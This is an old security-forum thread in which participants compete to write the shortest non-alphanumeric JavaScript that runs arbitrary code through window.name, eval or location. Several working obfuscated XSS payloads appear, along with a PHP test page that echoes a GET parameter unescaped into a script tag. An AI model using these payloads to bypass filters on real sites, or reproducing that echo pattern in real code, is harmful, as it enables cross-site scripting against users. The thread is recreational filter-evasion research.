You guys may have already tackled this, but I didn't recall seeing it yet...

There was a topic on here for the shortest non-alphanumeric JS to execute alert(1), changed to alert('owasp') for the AppSec challenge. Then much time has been invested trying to find the smallest set of nonalnum characters needed to execute arbitrary JS.

So I figured, why not for the fun of it combine the two - find the shortest nonalnum JS needed to execute arbitrary JS, regardless of how many characters are used.

By starting with .mario's solution to the AppSec challenge, I've gotten down to 154 so far:

name='alert(1)';

(ω=[[Ṫ,Ŕ,Ú,É,,Á,Ĺ,Ś,,,Ó,,,,Ç]=!''+[![η=!{}]]+{}][Ś+Ó+Ŕ+Ṫ])()[É+(ƒ=ω+η)[++η+η+[++η+η+η+η/η]]+Á+Ĺ](ω()[(Ñ=ƒ[η+[++η]])+Á+(η[Ç+Ó+Ñ+Ś+Ṫ+Ŕ+Ú+Ç+Ṫ+Ó+Ŕ]+η)[11]+É])

Not anything particularly new, but I enjoy playing around with this stuff...

-----------
Twitter | Blog



Edited 1 time(s). Last edit at 07/15/2010 07:34AM by theharmonyguy.

Well, those were supposed to be Unicode characters resembling the letters they represent... sorry for the encodings.

-----------
Twitter | Blog



Edited 1 time(s). Last edit at 07/15/2010 07:34AM by theharmonyguy.

@theharmonyguy

Nice to see you on here don't worry about the unicode it ain't your fault. It's sla.ckers, they need to configure UTF-8 in their db and charset

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

// 98

name="alert(1)";

(æ=([,Á,È,ª,É,,Ó,$]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])())[É+(µ=æ[$+Ç+Ó+Á])('½')[+[]]+Á+È](æ[µ('©ž')])

LeverOne

----------------------
~Veritas~

It's a huge pain in the ass to change the DB to unicode, I wouldn't count on it happening any time soon...

-id

ALTER DATABASE `dbname` DEFAULT CHARACTER SET utf8 COLLATE utf8_bin
ALTER TABLE `forum` DEFAULT CHARACTER SET utf8 COLLATE utf8_bin

find all intstances of htmlentities and make sure they have htmlentities($var, ENT_QUOTES, 'UTF-8')

done :P

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@LeverOne: Good thought to use btoa for 'v' and 'name', but for the latter case I'm wondering how practical it would be to include  and ž since they're control codes...

// 89

name='javascript:alert(1)';

(æ=([,Á,,ª,,,Ó,$]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])())[(µ=æ[$+Ç+Ó+Á])("–‡¶*'")]=æ[µ('©ž')]

@theharmonyguy

Quote

how practical it would be to include  and ž since they're control codes...

Yes, as well as characters 0-31. I do not quite understand what the problem? These symbols (127—159) can be filtered? Anything can be filtered.

In any case, let's set additional restrictions.
1. No alfanumeric characters.
2. No control characters.
3. These characters should be "clear" to sla.ckers.org (just for aesthetics).
4. Forbidden most of the base64 stunts (added).

Please, improve your code with some tricks that I showed.


LeverOne

----------------------
~Veritas~



Edited 4 time(s). Last edit at 07/17/2010 02:31PM by LeverOne.

No control chars anymore? And only chars that reflect correctly in slckrs? Phew - those are quite some restrictions - forbidding most of the base64 stunts...

This might help to help to get hands on a v that way :)

[µ='',[,,_,$,,,ø,,,,þ,,ð,,æ]=!µ/µ+µ+!!µ+!µ][_+$+þ+ø+ð+æ]+µ

@all

Do not trust .mario - it is a bad way! :D

@mario
It is a simple contest! We must ban "several script ninjas on the hackers forum sla.ckers.org" participate in "5 minutes" competitions. :D

----------------------
~Veritas~



Edited 4 time(s). Last edit at 07/17/2010 05:21PM by LeverOne.

LeverOne Wrote:
-------------------------------------------------------
> Yes, as well as characters 0-31. I do not quite
> understand what the problem? These symbols
> (127—159) can be filtered? Anything can be
> filtered.


I wasn't thinking so much of filtering as inserting - i.e., how are you going to make a request that includes those characters and get Firefox to reliably process it. Could just be a n00b thinking on my part (I'm new to infosec and definitely have a lot to learn).

@LeverOne Hahaha okay - so why not think about something new rather than reboil the stuff we already did? The charwall contest was awesome - and still haunts Gareth in his dreams. We should create something similarly good!

Oops, just noticed I had left some numbers in the code I originally posted - my bad. I've gotten down to 160 using a slightly different approach so far.

I'm totally game for more difficult/interesting challenges, you guys have just been way ahead of me on this stuff. :)

// 157, follows LeverOne's four rules

name='alert(1)';

(ð=[ƒ=+!'',[µ,æ,Ú,É,,Á,þ,$,,,ø,,,,Ç]=!!ƒ+[!ƒ]+{},Ñ=(ƒ/!ƒ+µ)[ƒ],ª=(ƒ[Ç+ø+Ñ+$+µ+æ+Ú+Ç+µ+ø+æ]+µ)[ƒ+[ƒ]]][$+ø+æ+µ])()[É+(ð+µ)[++ƒ+[++ƒ+ƒ+ƒ/ƒ]]+Á+þ](ð()[Ñ+Á+ª+É])


I tried employing some of the tricks that LeverOne and .mario have been using to shorten up the beginning, but without using base64 I would end up needing more letters and my code would get longer. I also needed numbers to get 'v' and 'm'.

Random sidenote: I was surprised to notice that this executes fine:

µ=[$,_]=!{}+{}; // µ='false[object Object]', $='f', _='a'



Edited 2 time(s). Last edit at 07/17/2010 04:59PM by theharmonyguy.

// 155

name='alert(1)';

(ð=[ƒ=+!'',[µ,æ,Ú,É,,Á,þ,$,,,ø,,,,Ç]=!!ƒ+[!ƒ]+{},[,Ñ]=ƒ/!ƒ+µ,ª=(ƒ[Ç+ø+Ñ+$+µ+æ+Ú+Ç+µ+ø+æ]+µ)[ƒ+[ƒ]]][$+ø+æ+µ])()[É+(ð+µ)[++ƒ+[++ƒ+ƒ+ƒ/ƒ]]+Á+þ](ð()[Ñ+Á+ª+É])

// 154

name='alert(1)';

(ð=[ƒ='',[µ,æ,Ú,É,,Á,þ,$,,,ø,,,,Ç]=!ƒ+[!++ƒ]+{},[,Ñ]=ƒ/!ƒ+µ,ª=(ƒ[Ç+ø+Ñ+$+µ+æ+Ú+Ç+µ+ø+æ]+µ)[ƒ+[ƒ]]][$+ø+æ+µ])()[É+(ð+µ)[++ƒ+[++ƒ+ƒ+ƒ/ƒ]]+Á+þ](ð()[Ñ+Á+ª+É])

@theharmonyguy
1.

Quote

how are you going to make a request that includes those characters and get Firefox to reliably process it

test.php

<?php
header('Content-Type: text/html; charset=utf-8');
if(isset($_GET['code']))  echo '<script>alert(btoa("'.$_GET['code'].'"))</script>';
?>

Request:
test.php?code=unencoded_data

To decode these symbols (&#150&#135&#157&#158), you can use any converter or a browser.

2. 154 - is not bad, but how about 137 136 118 ?

@mario

Quote

...so why not think about something new...

New awesome contest - a new drug, but I agree.

----------------------
~Veritas~



Edited 2 time(s). Last edit at 07/21/2010 10:16AM by LeverOne.

I need sleep. No awesome new contests.

I still have scream dreams "THE WALL", "Arrrrrrghhhh THE WALL"
It can be done. It can be done. It can be done

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@LeverOne: I'm down to 148 144 so far. No hints yet. :)



Edited 1 time(s). Last edit at 07/20/2010 04:34PM by theharmonyguy.

OK, I'm open to hints - I must be missing some trick because I just can't seem to get under 144:

(æ=[ƒ='',[µ,ð,Ú,É,,Ñ]=[!ƒ++]+ƒ[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}],_=Ñ+Á+(þ=ƒ[Ç+ø+Ñ+$+µ+ð+Ú+Ç+µ+ø+ð]+Á)[ƒ+[ƒ]]+É][$+ø+ð+µ])()[É+þ[++ƒ+[++ƒ*ƒ]]+Á+ª](æ()[_])

I've tried to get rid of the opening ƒ='', find a shorter way to get "c" or "v", but it always ends up throwing something else off.

@LeverOne: Just saw your last edit - 118?? Are you still using ([]['sort'])()['eval'](window['name'])?

New approach got me down to 130 126 123:

http:// victim/#*/alert(1)

(æ=[ƒ=!'',[µ,ð,,É,,Ñ,,,,Å]=[ƒ]+ƒ[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}]][$+ø+ð+µ])()[É+(µ+æ)[++ƒ+[ƒ*ƒ*ƒ]]+Á+ª]('/*'+æ()[ª+ø+Ç+Á+µ+Å+ø+Ñ])



Edited 7 time(s). Last edit at 07/21/2010 03:45PM by theharmonyguy.

@theharmonyguy

This trick is very good! You think in the right direction. I see my tips you do not need. After a while you yourself will understand everything. :)

----------------------
~Veritas~

Well, I'm stuck at 121:

(æ=[[µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])()[É+(µ+æ)[++ƒ+[ƒ*ƒ*ƒ]]+Á+ª]('/*'+æ()[ª+ø+Ç+Á+µ+Å+ø+Ñ])

(æ=[[µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/[],[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])()[É+(µ+æ)[++ƒ+[ƒ*ƒ*ƒ]]+Á+ª]('/*'+æ()[ª+ø+Ç+Á+µ+Å+ø+Ñ])

(æ=[[µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/![[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}]][$+ø+ð+µ])()[É+(µ+æ)[++ƒ+[ƒ*ƒ*ƒ]]+Á+ª]('/*'+æ()[ª+ø+Ç+Á+µ+Å+ø+Ñ])

(æ=[[µ,ð,,É,,Ñ,,,,Å]=[ƒ=!'']+ƒ[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}]][$+ø+ð+µ])()[É+(µ+æ)[++ƒ+[ƒ*ƒ*ƒ]]+Á+ª]('/*'+æ()[ª+ø+Ç+Á+µ+Å+ø+Ñ])

First, think about that number (ƒ*ƒ*ƒ), and you get 120 - is the limit.

Secondly, "eval" - this is the wrong direction, "location" - this is the right direction.

=====

Quote

That number is 2*2*2=8... not following you.

I mean there is a shorter way to get 8.

----------------------
~Veritas~



Edited 1 time(s). Last edit at 07/22/2010 10:08AM by LeverOne.

LeverOne Wrote:
-------------------------------------------------------
> First, think about that number (ƒ*ƒ*ƒ), and you
> get 120 - is the limit.

That number is 2*2*2=8... not following you.

Totally forgot about bitwise operators. Very slick.

LeverOne Wrote:
-------------------------------------------------------
> Secondly, "eval" - this is the wrong direction, "location" - this is the right direction.

I do think I follow this advice; working on a new version.



Edited 1 time(s). Last edit at 07/22/2010 10:34AM by theharmonyguy.

Why do we have this additional rules again? ;)

name='javascript:alert(1)';
(w=([t,r]=!''+'',[[,a,l,s,,,,,n,,i]=!t+t+(~t/!t),[,o,b,,,c]={}+t][s+o+r+t])())[l+o+c+a+t+i+o+n]=w[w[b+t+o+a]('©ž')]
116

Well if we drop the newer rules, I'm already ahead of you... :)

// 109

name='javascript:alert(1)';

(w=([t,r,,e,,n,,i]=[x=!'']+x/!x,[[,a,l,s,,,o,b,,,c]=!x+{}][s+o+r+t])())[l+o+c+a+t+i+o+n]=w[w[b+t+o+a]('©ž')]

But LeverOne already got down to 89 using btoa anyway...



Edited 2 time(s). Last edit at 07/22/2010 11:25AM by theharmonyguy.

I know e is a totally awesome character but now me haz 108 :P

(w=([t,r,,,,n,,i]=[x=!'']+x/!x,[[,a,l,s,,,o,b,,,c]=!x+{}][s+o+r+t])())[l+o+c+a+t+i+o+n]=w[w[b+t+o+a]('©ž')]

Guys, as we agreed, without BTOA!!! Thus, my limit - 118 104 103 (with Gareth's trick)!

----------------------
~Veritas~



Edited 2 time(s). Last edit at 07/22/2010 04:01PM by LeverOne.

Not the first time I've forgotten about a leftover letter. :)

You know, we could change it to be cross-browser - that would not only remove btoa but (x=[]['sort'])() as well. Though these exercises may be more fun for a newbie like me. :)